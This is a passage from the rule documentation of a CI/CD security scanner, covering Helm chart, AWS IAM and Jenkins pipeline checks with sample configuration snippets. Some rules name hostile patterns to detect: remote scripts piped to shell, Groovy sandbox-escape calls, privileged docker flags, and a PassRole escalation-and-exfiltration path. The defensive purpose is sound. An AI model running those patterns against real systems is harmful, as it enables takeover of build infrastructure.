How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.

Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
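The migrated file might look like this (names and versions are illustrative):

```yaml
# Chart.yaml — Helm 3 format
apiVersion: v2
name: my-service
version: 1.4.2
appVersion: "2.0.1"
dependencies:            # moved here from the old sibling requirements.yaml
  - name: postgresql
    version: 12.5.8
    repository: https://charts.example.com/stable
```

followed by helm dependency update to produce the Chart.lock that HELM-002 reads.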

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: HELM-001 in the Helm provider.

HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Three failure shapes:

  1. Chart.yaml declares dependencies but no Chart.lock exists at all.
  2. Chart.lock exists but its dependencies: list is missing entries declared in Chart.yaml (drift after an edit without re-running helm dependency update).
  3. Chart.lock lists every dependency but one or more entries lack a digest: field (lock generated by an old Helm 3 version that didn't always populate it).

v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.

Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download; without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Charts with no dependencies (the dependencies: key is absent or empty) pass automatically. There is nothing to lock.

Source: HELM-002 in the Helm provider.

HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:

  • https://: ChartMuseum / OSS chart repos. The default for public Helm charts.
  • oci://: registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.
  • file://: an in-repo dependency. No network surface.
  • @alias: a local alias for a previously registered helm repo add URL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's ~/.config/helm/repositories.yaml).

Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
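The three accepted shapes side by side (hosts and versions are placeholders):

```yaml
dependencies:
  - name: redis
    version: 18.1.0
    repository: https://charts.example.com/stable   # TLS chart repo
  - name: internal-lib
    version: 0.3.0
    repository: oci://registry.example.com/charts   # OCI registry (HTTPS pull in Helm 3.8+)
  - name: local-common
    version: 0.1.0
    repository: file://../charts/common             # in-repo, no network surface
```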

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: HELM-003 in the Helm provider.

HELM-004: Chart dependency version is a range, not an exact pin MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives; a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.

Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.

Source: HELM-004 in the Helm provider.

HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. A maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does: the field exists but doesn't carry a real chain-of-custody signal.

Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous: fine for a personal scratch chart, not for one your CI pipeline will deploy to production.
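A minimal passing block (contact details are placeholders):

```yaml
maintainers:
  - name: Platform Team
    email: platform@example.com
    url: https://github.com/example-org/charts
```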

Known false positives.

  • Library charts (Chart.yaml type: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with --ignore-file when this matches your situation.

Source: HELM-005 in the Helm provider.

HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The field is a string carrying a Helm-flavoured SemVer range. Empty or missing values fail the rule, and whitespace-only values fail too; an obviously blank key should not satisfy a posture check.

Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose Kubernetes version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.

Known false positives.

  • Library charts (Chart.yaml type: library) that wrap version-agnostic helpers often legitimately ship without kubeVersion. Suppress with --ignore-file when the chart genuinely targets every supported Kubernetes minor.

Source: HELM-006 in the Helm provider.

HELM-007: Chart.yaml description field is empty or missing LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.

Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.

Source: HELM-007 in the Helm provider.

HELM-008: Chart.lock generated more than 90 days ago MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares it against now, firing when the delta exceeds 90 days. Charts without a Chart.lock are skipped, and charts whose generated: field is malformed or absent silently pass; HELM-002 covers the missing-lock case directly, from a different angle.

Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.

Known false positives.

  • A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with --ignore-file when this matches your situation.

Source: HELM-008 in the Helm provider.

HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.

Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs pointing at localhost are not exempted; production charts shouldn't ship references to a developer-local endpoint anyway.

Source: HELM-009 in the Helm provider.

HELM-010: Chart.yaml appVersion field is empty or missing LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE and release tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.

Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.

Source: HELM-010 in the Helm provider.

IAM-000: IAM API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: IAM-000 in the AWS provider.

IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.

Recommendation. Replace AdministratorAccess with least-privilege policies.

Source: IAM-001 in the AWS provider.

IAM-002: CI/CD role has wildcard Action in attached policy HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.

Recommendation. Replace wildcard actions with specific IAM actions.

Source: IAM-002 in the AWS provider.

IAM-003: CI/CD role has no permission boundary MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.

Recommendation. Attach a permissions boundary defining max permissions.

Source: IAM-003 in the AWS provider.

IAM-004: CI/CD role can PassRole to any role HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.

Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
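A scoped statement along these lines (account ID, role ARN, and service are placeholders):

```json
{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/app-task-role",
  "Condition": {
    "StringEquals": { "iam:PassedToService": "ecs-tasks.amazonaws.com" }
  }
}
```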

Source: IAM-004 in the AWS provider.

IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.

Recommendation. Add a Condition requiring sts:ExternalId for external principals.
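Sketch of a trust-policy statement with the tenancy pin (IDs are placeholders; the external ID value comes from the SaaS vendor):

```json
{
  "Effect": "Allow",
  "Principal": { "AWS": "arn:aws:iam::999988887777:root" },
  "Action": "sts:AssumeRole",
  "Condition": {
    "StringEquals": { "sts:ExternalId": "vendor-assigned-tenant-id" }
  }
}
```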

Source: IAM-005 in the AWS provider.

IAM-006: Sensitive actions granted with wildcard Resource MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).

Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).

Source: IAM-006 in the AWS provider.

IAM-007: IAM user has access key older than 90 days HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Every user in the account is evaluated. CI/CD tooling that still uses IAM users (older Jenkins agents, GitHub Actions pre-OIDC, third-party schedulers) shows up here. The 90-day window matches the common compliance baseline; rotate sooner if the key is used from on-prem or an untrusted runner.

Recommendation. Rotate or delete IAM access keys older than 90 days. Long-lived static credentials are the #1 way compromised CI credentials get reused across environments; prefer short-lived STS tokens via OIDC federation or an assumed role.

Source: IAM-007 in the AWS provider.

IAM-008: OIDC-federated role trust policy missing audience or subject pin HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. IAM-005 already covers cross-account AWS principals. This rule targets the OIDC federation path specifically because the blast radius of a missed audience/subject pin is the entire identity provider's tenant base (e.g. all GitHub users, not just your org).

Recommendation. Every Allow statement that trusts a federated OIDC provider (token.actions.githubusercontent.com, GitLab, CircleCI, Terraform Cloud, etc.) must pin both the audience (...:aud = sts.amazonaws.com) and a subject prefix (...:sub matching repo:myorg/*). Without these, any workflow from any tenant can assume the role.
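For GitHub Actions the pinned trust-policy statement looks roughly like this (account ID and repo path are placeholders):

```json
{
  "Effect": "Allow",
  "Principal": {
    "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
  },
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {
    "StringEquals": { "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" },
    "StringLike":   { "token.actions.githubusercontent.com:sub": "repo:myorg/my-repo:*" }
  }
}
```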

Source: IAM-008 in the AWS provider.

JF-001: Shared library not pinned to a tag or commit HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. @main, @master, @develop, no-@ref, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.

Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.
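Both accepted pin shapes (library name and refs are illustrative; use one or the other):

```groovy
// Release-tag pin
@Library('shared-utils@v1.4.2') _

// Or a full 40-char commit SHA pin:
// @Library('shared-utils@0a1b2c3d4e5f60718293a4b5c6d7e8f901234567') _
```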

Source: JF-001 in the Jenkins provider.

JF-002: Script step interpolates attacker-controllable env var HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $BRANCH_NAME / $GIT_BRANCH / $TAG_NAME / $CHANGE_* are populated from SCM event metadata the attacker controls. Single-quoted Groovy strings don't interpolate so they're safe; only double-quoted / triple-double-quoted bodies are flagged.

Recommendation. Switch the affected sh/bat/powershell step to a single-quoted string (Groovy doesn't interpolate single quotes), and pass values through a quoted shell variable (sh 'echo "$BRANCH"' after withEnv([...])).
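The rewrite sketched (the git command is illustrative):

```groovy
// Unsafe: Groovy interpolates the tainted value into the command text itself
// sh "git checkout ${env.BRANCH_NAME}"

// Safe: single-quoted Groovy body; the shell reads the quoted env var at runtime,
// so command substitutions in a branch name are never evaluated
sh 'git checkout "$BRANCH_NAME"'
```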

Source: JF-002 in the Jenkins provider.

JF-003: Pipeline uses agent any (no executor isolation) MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. agent any is the broadest possible executor scope: any registered executor can be picked, including ones with broader IAM / file-system access than this build needs. A single compromised job therefore spreads its blast radius across every runner pool.

Recommendation. Replace agent any with agent { label 'build-pool' } (targeting a labeled pool) or agent { docker { image '...' } } (ephemeral container). Reserve broad-access agents for jobs that genuinely need them.

Source: JF-003 in the Jenkins provider.

JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used; the safe alternative is withAWS(role: '…').

Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-004 in the Jenkins provider.

JF-005: Deploy stage missing manual input approval MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A stage named deploy / release / publish / promote should either use the declarative input { ... } directive or call input message: ... somewhere in its body. Without one, any push that triggers the pipeline ships to the target with no human review.

Recommendation. Add an input step to every deploy-like stage (e.g. input message: 'Promote to prod?', submitter: 'releasers'). Combine with a Jenkins folder-scoped permission so only release engineers see the prompt.
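Declarative shape (stage name, message, and submitter group are illustrative):

```groovy
stage('Deploy') {
    input {
        message 'Promote to prod?'
        submitter 'releasers'    // Jenkins users/groups allowed to approve
    }
    steps {
        sh './deploy.sh prod'
    }
}
```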

Source: JF-005 in the Jenkins provider.

JF-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Passes when cosign / sigstore / slsa-* / notation-sign appears in executable Jenkinsfile text (comments are stripped before matching).

Recommendation. Add a sh 'cosign sign --yes …' step (the cosign-installer Jenkins plugin handles binary install). Publish the signature next to the artifact and verify it at deploy.

Source: JF-006 in the Jenkins provider.

JF-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Passes when a direct SBOM tool token (CycloneDX, syft, anchore, spdx-sbom-generator, sbom-tool) appears in executable code, or when Trivy is paired with sbom / cyclonedx in the same file. Comments are stripped before matching.

Recommendation. Add a sh 'syft . -o cyclonedx-json > sbom.json' step (or Trivy with --format cyclonedx) and archive the result with archiveArtifacts.

Source: JF-007 in the Jenkins provider.

JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.

Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: JF-008 in the Jenkins provider.

JF-009: Agent docker image not pinned to sha256 digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. agent { docker { image 'name:tag' } } is not digest-pinned, so a repointed registry tag silently swaps the executor under every subsequent build. Unlike the YAML providers, Jenkins has no separate tag-pinning check, so this one fires at HIGH regardless of whether the tag is floating or immutable.

Recommendation. Resolve each image to its current digest (docker buildx imagetools inspect <ref> prints it) and reference it via image '<repo>@sha256:<digest>'. Automate refreshes with Renovate.

Source: JF-009 in the Jenkins provider.

JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.

Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.
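Sketched remediation (credential IDs and role ARN are illustrative):

```groovy
environment {
    // resolved from the Jenkins credentials store at runtime; no literal in source
    AWS_ACCESS_KEY_ID     = credentials('aws-access-key-id')
    AWS_SECRET_ACCESS_KEY = credentials('aws-secret-access-key')
}

// Better still: drop the static keys entirely and assume a short-lived role per build
// withAWS(role: 'arn:aws:iam::123456789012:role/jenkins-deploy') { ... }
```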

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-010 in the Jenkins provider.

JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).

Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-011 in the Jenkins provider.

JF-012: load step pulls Groovy from disk without integrity pin MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. load 'foo.groovy' evaluates whatever exists at the path when the build runs; there's no integrity check, so a workspace mutation can swap the loaded code between runs.

Recommendation. Move shared Groovy into a Jenkins shared library (@Library('name@<sha>')). Those are version-pinned and JF-001 audits them. Reserve load for one-off development experiments.

Source: JF-012 in the Jenkins provider.

JF-013: copyArtifacts ingests another job's output unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Recognises both copyArtifacts(projectName: ...) and the older step([$class: 'CopyArtifact', ...]) form. If the upstream job accepts multibranch or PR builds, the artifact may have been produced by attacker-controlled code.

Recommendation. Add a verification step before consuming the artifact: sh 'sha256sum -c manifest.sha256' against a manifest the producer signed, or cosign verify over the artifact directly. Restrict the upstream job to non-PR builds via branch protection if verification isn't feasible.

Source: JF-013 in the Jenkins provider.

JF-014: Agent label missing ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Static Jenkins agents that persist between builds leak workspace files and process state. The check looks for an ephemeral substring in agent { label '...' } blocks.

Recommendation. Register Jenkins agents with ephemeral lifecycle (e.g. Kubernetes pod templates or EC2 Fleet plugin) and include ephemeral in the label string so the pipeline declares its expectation.

Known false positives.

  • The check looks for the literal substring ephemeral in the agent label. Teams that use a different convention (temp, runner-pool, org-specific ARC labels) trip the rule even when their runners are auto-scaled and ephemeral in fact. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH.

Source: JF-014 in the Jenkins provider.

JF-015: Pipeline has no timeout wrapper, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a timeout() wrapper, the pipeline runs until the Jenkins controller's global timeout (or indefinitely if none is configured). Explicit timeouts cap blast radius and the window during which a compromised step has workspace access.

Recommendation. Wrap the pipeline body or individual stages with timeout(time: N, unit: 'MINUTES') { … }.
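Both granularities sketched (durations are illustrative):

```groovy
pipeline {
    agent any
    options {
        timeout(time: 60, unit: 'MINUTES')     // whole-pipeline ceiling
    }
    stages {
        stage('Build') {
            steps {
                timeout(time: 15, unit: 'MINUTES') {   // tighter per-step cap
                    sh 'make build'
                }
            }
        }
    }
}
```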

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-015 in the Jenkins provider.

JF-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a Jenkinsfile. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
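The download-verify-execute pattern inside a Jenkinsfile step (URL and checksum are placeholders you must supply):

```groovy
sh '''
    curl -fsSLo install.sh https://example.com/install.sh
    # pin the expected checksum; the build fails closed if the content changes
    echo "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef  install.sh" | sha256sum -c -
    bash install.sh
'''
```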

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: JF-016 in the Jenkins provider.

JF-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a Jenkinsfile give the container full access to the build agent, enabling container escape and lateral movement.
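The flag set above can be sketched as a single pattern; this assumes the shell command text has already been extracted from the Jenkinsfile and is illustrative only:

```python
import re

# Insecure docker-run flags named above: privileged mode, added
# capabilities, host networking, and a host-root volume mount.
INSECURE_FLAGS = re.compile(
    r"--privileged\b|--cap-add[= ]|--net(?:work)?[= ]host|-v\s+/:/"
)

def docker_run_is_insecure(cmd: str) -> bool:
    cmd = cmd.strip()
    return cmd.startswith("docker run") and bool(INSECURE_FLAGS.search(cmd))
```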

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-017 in the Jenkins provider.

JF-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a Jenkinsfile. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-018 in the Jenkins provider.

JF-019: Groovy sandbox escape pattern detected CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detects Groovy patterns that bypass the Jenkins script security sandbox: Runtime.getRuntime(), Class.forName(), .classLoader, ProcessBuilder, and @Grab. These give the pipeline (or an attacker who controls its source) unrestricted access to the Jenkins controller JVM, full RCE.
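A substring scan over the comment-stripped Groovy is enough to sketch the idea; the token list mirrors the primitives named above and is illustrative, not the provider's actual code:

```python
# Sandbox-escape primitives: each one reaches the controller JVM
# outside the script-security sandbox.
ESCAPE_TOKENS = (
    "Runtime.getRuntime(",
    "Class.forName(",
    ".classLoader",
    "ProcessBuilder",
    "@Grab",
)

def has_sandbox_escape(groovy_src: str) -> bool:
    return any(tok in groovy_src for tok in ESCAPE_TOKENS)
```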

Recommendation. Remove direct Runtime/ClassLoader calls. Use Jenkins pipeline steps instead. Avoid @Grab for untrusted dependencies.

Source: JF-019 in the Jenkins provider.

JF-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck. Comments are stripped before matching.

Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: JF-020 in the Jenkins provider.

JF-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest: exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
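The substitutions above can be sketched as a lookup table; this is a hypothetical shape for such a fixer, not the scanner's actual --fix implementation:

```python
# Bare install command -> lockfile-enforcing equivalent, mirroring
# the recommendation above.
LOCKFILE_EQUIVALENT = {
    "npm install": "npm ci",
    "yarn install": "yarn install --frozen-lockfile",
    "bundle install": "bundle install --frozen",
    "pip install -r requirements.txt":
        "pip install --require-hashes -r requirements.txt",
}

def suggest_fix(cmd: str) -> str:
    # Unknown commands pass through unchanged.
    return LOCKFILE_EQUIVALENT.get(cmd.strip(), cmd.strip())
```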

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-021 in the Jenkins provider.

JF-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.
